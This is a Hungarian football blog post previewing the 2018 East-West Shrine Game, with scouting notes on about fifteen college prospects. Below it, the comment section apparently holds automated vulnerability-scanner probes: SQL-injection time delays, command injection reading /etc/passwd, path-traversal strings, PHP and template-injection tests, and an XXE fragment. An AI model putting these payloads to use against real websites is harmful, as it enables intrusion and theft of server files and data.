East - West Shrine Game 2018

Írta: Drip — 2018. január 20., 12:31

Ma este a legrégebb óta megrendezett egyetemi All-Star meccsel tudunk hangolni a holnapi konferenciadöntőkre.

Habár a hétvége inkább az NFL-ről és a két Championship meccsről fog szólni, megéri megemlékezni a college post-season all-star gálái közül a 2. legrangosabbról, vagyis az East-West Shrine Game-ről, amelyet most szombaton fognak lejátszani. 

Mindenféleképpen érdemes tisztázni, hogy itt (és a későbbi Senior Bowl-on) is a legjobbnak vélt végzős játékosok kapnak lehetőséget, hogy bizonyítsanak, és a meccset megelőző edzéseket is éles szemmel figyelik az NFL scoutok, így nem csak a futball szerelmeseinek de önjelölt scoutoknak is ajánlott a meccs megtekintése. Főként középső és hátsó körös prospectek kerülhetnek ki (bár már előfordult természetesen első körös választott is), és olyan játékosok is megfordultak már itt korábban, mint Brett Favre, Tom Brady, Josh Norman és Jimmy Garoppolo. 

Ezek ismeretében, érkezzen (nem fontossági sorrendben) néhány játékos, akikre érdemes lesz odafigyelni:

Damon Webb – S (Ohio State)
Webb egy olyan secondaryből tudott kitűnni, ami tömve van sophomore és junior játékosokkal. Atletikuságának és sokoldalúságának köszönhetően nem csak safety de cornerback poszton is képes játszani, valamint emberezésben és cover 3-as felállásoknál is hasznos játékos volt. Mindezek ellenére legerősebb tulajdonsága a tackle-k végrehajtása. Az edzéseken is jól teljesített, volt interception-je és több scout is dícsérte. 

Chad Thomas – DE (Miami)
Thomas egyike lehet azon játékosoknak, akik a leghamarabb fognak elkelni a drafton a Shrine Game résztvevők közül. A Miami védelem egyik vezére, egy igazán masszív játékos, hosszú karokkal és feltűnő erővel rendelkezik, ellenben nem egy elit atléta. Játékával viszont tökéletesen ellensúlyozza ezt és nagyon hatékony tud lenni a futás ellen, valamint a zsebet is képes szűkíteni. Olyan csapatoknak lehet vonzó, ahol five-technique szerepkörben tud majd játszani. Érdekesség vele kapcsolatban, hogy kérdőjelnek számít nála az, hogy mennyire is elhívatott az NFL iránt, ugyanis tehetséges DJ is akinek lenne jövője zenei producerként is. 

Riley Ferguson – QB (Memphis)
Ha azt kérdezik most, hogy kinek van a legerősebb karja a QB prospectek közül valószínűleg mindenki rávágja, hogy Josh Allen pedig a hátsó körökben is lesz egy személy, aki nem akármilyen karerővel bír. Riley Ferguson földön nem fog sok yardot szerezni, és döntés hozatalban is vannak problémái, de a nagy játékot mindig meg tudja csinálni. Klasszikus gunslinger típus, akivel kell még bőven dolgozni, de igazi sleeper prospect, aki egy jó meccsel és későbbi combine-al még több figyelmet is kaphat.

Justin Lawler – DE (SMU)

Az SMU legjobb védője volt, kitűnő végzős évvel a háta mögött. Ideálisan felépített passzsiettető defensive end-ről van szó, nagyszerűen támadja a széleket és könnyedén viszi át sebességét a támadásokba. Jelenleg ugyan eléggé egy dimenziós védőnek tűnik, mégis egy kis munkával szolid 4-3as DE válhat belőle. Az edzéseken kissé lassan kezdett, de szépen lassan belelendült és az 1vs1 drilleken brillírozott és tarthatatlan volt. Érdekesség vele kapcsolatban, hogy a ’14-’15-ös szezonban volt egy 3 yardos elkapott TD-je.

Brandon Facyson – CB (Virginia Tech)
A 2017-es szezon elején a legjobb cornerbackek között tartották számon, azonban sajnos a sérülések közbe szóltak és megakadályozták, hogy domináns évet tudjon maga mögött. Ha egészséges Facyson elképesztő cover 3 képeségekkel rendelkezik, konstansan győz már a LOS-nél jó technikájának köszönhetően és képes magas szinten tükrözni az elkapót. Emellett a futás ellen is hasznos. Jó méretei, impresszív junior felvételei és kellő tapasztalata van, már csak az egészsége lesz kérdés. Ha minden klappol akár kezdő CB is lehet a jövőben. 

Matthew Thomas – OLB (Florida State)
Thomas annak idején még top recruit-ként érkezett az egyetemre, de a depth charton is akadtak problémái valamint a 2015-ös szezont sérülés miatt végig ülte. 2016-ban kapta meg a lehetőséget. Kissé könnyű felépítése van, viszont gyenge oldali linebacker szerepkörben remekül teljesített. Megfelelő sebessége van, hogy odaérjen a labdás emberhez, illetve, hogy cover feladatokat is képes legyen ellátni. Olykor túlontúl is agresszív, és szinte biztos, hogy kell majd magára izmot pakolni, de ST feladatokat rögtön el tud majd látni, valamint biztos backup linebacker-ként is használható lesz rookie évében, ha pedig tud fejlődni határ a csillagos ég. A csapatok és a scoutok minden edzés után elözönlötték. 

Ja’von Rolland-Jones – DE (Arkansas State)
Sosem jön rosszul, ha önéletrajzunkba beírhatjuk, hogy egyetemi all time sack vezetők vagyunk. Rolland-Jones 42 sack-el vezeti jelenleg ezt a listát, emellé pedig 5. helyen áll TFL-k tekintetében 63-al. Első évét kikellett hagynia sérülés miatt, viszont Freshman All-American évvel tudott visszatérni. Alsó teste rendkívül hajlékony és robbanékony első lépésével tudott mindig felülkerekedni aktuális ellenfelén. Nem a legerősebb a pályán de mindig megtalálja a módját, hogy a backfieldre kerüljön. Jones egy igazi 3rd down passzsiettető specialista lehet, ha betud építeni a repertoárjába egy-két counter mozdulatot. 

DaeSean Hamilton – WR (Penn State)
Hamilton a 2018-as draft egyik nagy nyertese lehet. A Happy Valleyben két diplomát szerző elkapó szép karriert tudhat magáénak és az idei évben is több kiemelkedő meccse is volt (A Fiesta Bowl-on a Washington ellen pl.: 5 elkapás 110 yard és 2 TD) Elsősorban a slot pozícióból lehet a legnagyobb profitja, de a PSU többször is felállította a pálya szélére is. Az NFL-ben viszont bizonyítania kell, hogy konzisztensen képes helyt állni szélső elkapóként is. Lelkes blokkoló bár még van hova fejlődnie e téren. Az edzések során több scout is kiemelte, hogy remekül használta kezeit, hogy a jam-et elkerülje, valamint 1vs1 drilleken is brillírozott, Grant Haley-t például nagyon ott hagyta. 

Chase Edmonds – RB (Fordham)
A small school prospecteket sem illik kihagyni, és Edmonds az FCS legjobb futó közé tartozott az elmúlt két évben. Figyelemre méltó lábmunkája és oldalirányú sebességgel rendelkezik, nyitott terepen pedig megállíthatatlan. Emellett megmutatta, hogy 3rd down RB szerepkörben is lehet rá számítani. Test mozgásából és csípőjének lazaságából ítélve az NFL-ben passzjátékoknál lehet korán szerepe. Kisebb rossz hír, hogy edzés közben összeszedett egy boka sérülést és idáig tisztázatlan volt, hogy pályára lép-e, most viszont már biztos, hogy kihagyja a meccset. Ettől függetlenül mindenképpen itt a helye, hiszen a későbbiekben is érdemes lesz rá figyelni.

Grant Haley – CB (Penn State)
3 évig volt kezdő a PSU védelmében és végzős évére a csapatkapitánynak is választották. Nem riad vissza a labdás embertől, jól választ szöget, hogy földre vigye az ellenfelét. Szolid cover képességei miatt akár kívül akár a nickel pozícióban képes helyt állni. viszont azt lekell szögezni, hogy semmiképpen nincsenek prototípus méretei, emiatt az NFL-ben még lesznek gondjai. Elsősorban ST játékosként és nickel CB-ként lehet majd rá számítani.

Tre Flowers – S (Oklahoma State)
Flowers hosszú vékony testtel és hosszú karokkal rendelkezik. Kifejezetten szeret az útvonalak alá támadni ám pont ezért egy jobb irányító könnyen becsaphatja. Screen játékoknál gyakran felbukkan a play végkifejleténél hála kifogyhatatlan motorjának. Ha szerelnie kell hosszú karjai remekül jönnek és technikája is megfelelő. Leginkább boksz safety-nek lehet elképzelni egy 3-4 vagy cover 3at játszó csapatban. Testalkata és játék stílusa is emlékeztet George Ilokára. Jelenleg 4.-5. körös prospect, de egy jó Combine-al simán becsúszhat a 2. napra. 

Poona Ford – DT (Texas)
4 évig volt kezdő a Longhorns védelmében. Félelmetes testalkata van ehhez képest megdöbbentően atletikus. Nagyon jól érzi az irányokat, robbanékony és hajlékony is. Első lépésével képes a magasabb falemberek alá kerülni és így helyzetbe hozni magát, hogy a gapeken átrobbanhasson. Mind testalatban és játékstílusban is Sheldon Day-re hajaz, és a leghatékonyabb egy passzsiettető DT szerepkörben lenne egy 4-3as védelemben. Ford egyébként nem csak a Shrine Game-n de a Senior Bowl-on is bizonyíthat majd.

Daurice Fountain – WR (Northern Iowa)
Egész héten mindenki róla beszélt, igazi meglepetés emberként robbant be. Főleg sebességével volt képes kitűnni a többi WR közül, ami gimnáziumi futó háttere miatt nem meglepő. Emellett azonban konstansan képes volt leválni a cornerekről és dropja sem volt. J.T. Barrett-el hamar megtalálta a közös hangot. Útvonalain még van mit javítani de kétségkívül Ő javított a legtöbbet a megítélésén, ha pedig kap Combine meghívót még tovább lőheti magát a boardokon. 

Tegray Scales – LB (Indiana)
Scales egy All-American linebacker, aki a Hoosier védelem alappillére voltaz elmúlt 4 évben. Teljesen korrekt atléta, aki szolid sebességgel és oldalirányú gyorsasággal rendelkezik, ezért blitzeknél is gyakran használták és rendszeresen nyomás alá helyezte az ellenfél irányítóját. Futás ellen is hasznos játékos, jól támadja a gapeket és edzések során is megmutatta, hogy képes odaérni a labdás emberhez, továbbá man-to-man képességeit is megmutatta a héten. Habár odaér az emberhez üres területen még mindig problémái akadnak a szerelésekkel. Egy hybrid linebacker szerepkörben lehet a legjobban elképzelni, aki képes mind három down alatt a pályán lenni. 

Jordan Thomas - TE/WR (Mississippi State)
Igazi ritkaság amikor egy 280 lbs-t nyomó játékos képes a pályán meccsről meccsre elkapásokat bemutatni. Thomas márpedig ilyen, remek kezei vannak és méretei miatt páratlan elkapási hatótávolsága van. A West edzésein rengetegszer állították fel elkapóként és Ő maga is szeretne inkább WR lenni, mégis inkább a TE poszt lenne a legmegfelelőbb számára. Egyesek azt is mondták, hogy lehetne Tackle is. Edzések során elmondta, hogy be akarja bizonyítani, hogy blokkolni is tud és nem csak elkapni, de azt is kihangsúlyozta, hogy egy elkapóval kevesebben vannak így természetesen ha kell bármikor be tud állni oda is.


Akire pedig figyelni kellene, de hazautazott:

Quinton Flowers – QB (UCF)
A UCF irányítója kihagyhatatlan ebből a felsorolásból és nem csak statisztikái miatt. Egy érdekes prospectről van szó, aki alacsony mérete és főként ingatag dobó mechanikája miatt valószínűleg nem sok csapatnál jön szóba mint QB. Mindenbizonnyal Ő maga is érzi ezt, valamint a Shrine Game-n az edzők is így vélekednek hiszen nem csak QB drilleken vett részt hanem több más poszton is pl.: punt visszahordásoknál is megnézték mit tud. Flowers útja vitathatatlanul érdekes lesz a draftig és azon túl az NFL-be való beilleszkedésig is. 
Mindezek ellenére sajnos egy tragikus családi haláleset miatt biztos, hogy nem lesz ott a meccsen. Szegény Flowers-re rájár a rúd, ezelőtt már elvesztette édesapját, édesanyját és bátyját is.


Még 5 név a végére akik jó hetet zártak:

J.T. Barrett – QB (Ohio State)
Brett Toth – C (Army)
Chris Worley – LB (Ohio State)
Avonte Maddox - CB (Pitt)
Justin Watson – WR (Penn)


Hozzászólások

több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'+response.write(9166600*9901240)+'
több mint 5 éve
Törölt felhasználó
"+response.write(9166600*9901240)+"
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
&cat /etc/passwd&
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'&cat /etc/passwd&'
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
20 and sleep(4)
több mint 5 éve
Törölt felhasználó
"&cat /etc/passwd&"
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
cat /etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20 or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
`cat /etc/passwd`
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20' and sleep(4)='
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
|cat /etc/passwd#
több mint 5 éve
Törölt felhasználó
20' and (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 5 éve
Törölt felhasználó
20" and sleep(4)="
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"|"ld
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd.jpg
több mint 5 éve
Törölt felhasználó
20' or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
;cat /etc/passwd;
több mint 5 éve
Törölt felhasználó
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
több mint 5 éve
Törölt felhasználó
268435455
több mint 5 éve
Törölt felhasználó
20" or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
${99069+99201}
több mint 5 éve
Törölt felhasználó
';cat /etc/passwd;'
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20'=sleep(4)='
több mint 5 éve
Törölt felhasználó
";cat /etc/passwd;"
több mint 5 éve
Törölt felhasználó
/../..//../..//../..//../..//../..//etc/passwd.jpg
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20"=sleep(4)="
több mint 5 éve
Törölt felhasználó
||cat /etc/passwd
több mint 5 éve
Törölt felhasználó
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
több mint 5 éve
Törölt felhasználó
1e309
több mint 5 éve
Törölt felhasználó
1some_inexistent_file_with_long_name%00.jpg
több mint 5 éve
Törölt felhasználó
20;select pg_sleep(4); --
több mint 5 éve
Törölt felhasználó
&dir
több mint 5 éve
Törölt felhasználó
20&n923770=v911638
több mint 5 éve
Törölt felhasználó
/etc/passwd
több mint 5 éve
Törölt felhasználó
'"\'\");|]*{
<>
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt?%00.jpg
több mint 5 éve
Törölt felhasználó
20';select pg_sleep(4); --
több mint 5 éve
Törölt felhasználó
'&dir&'
több mint 5 éve
Törölt felhasználó
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
több mint 5 éve
Törölt felhasználó
)
több mint 5 éve
Törölt felhasználó
testasp.vulnweb.com
több mint 5 éve
Törölt felhasználó
20; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
"&dir&"
több mint 5 éve
Törölt felhasználó
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
!(()&&!|*|*|
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20'; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
|dir
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
^(#$!@#$)(()))******
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20"; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
'|dir
több mint 5 éve
Törölt felhasználó
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
file:///etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"|dir
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
;print(md5(acunetix_wvs_security_test));
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'"()
több mint 5 éve
Törölt felhasználó
/\../\../\../\../\../\../\../etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
';print(md5(acunetix_wvs_security_test));$a='
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/xss.html?%00.jpg
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
WEB-INF/web.xml
több mint 5 éve
Törölt felhasználó
";print(md5(acunetix_wvs_security_test));$a="
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
WEB-INF\web.xml
több mint 5 éve
Törölt felhasználó
acunetix_wvs_invalid_filename
több mint 5 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini
több mint 5 éve
Törölt felhasználó
comment
több mint 5 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}\
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
1'"
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../boot.ini
több mint 5 éve
Törölt felhasználó
comment
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
több mint 5 éve
Törölt felhasználó
//www.acunetix.tst
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
\
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini.jpg
több mint 5 éve
Törölt felhasználó
comment/.
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'"
több mint 5 éve
Törölt felhasználó


]>
&acunetixent;
több mint 5 éve
Törölt felhasználó
................windowswin.ini
több mint 5 éve
Törölt felhasználó
@@J0nQ5
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó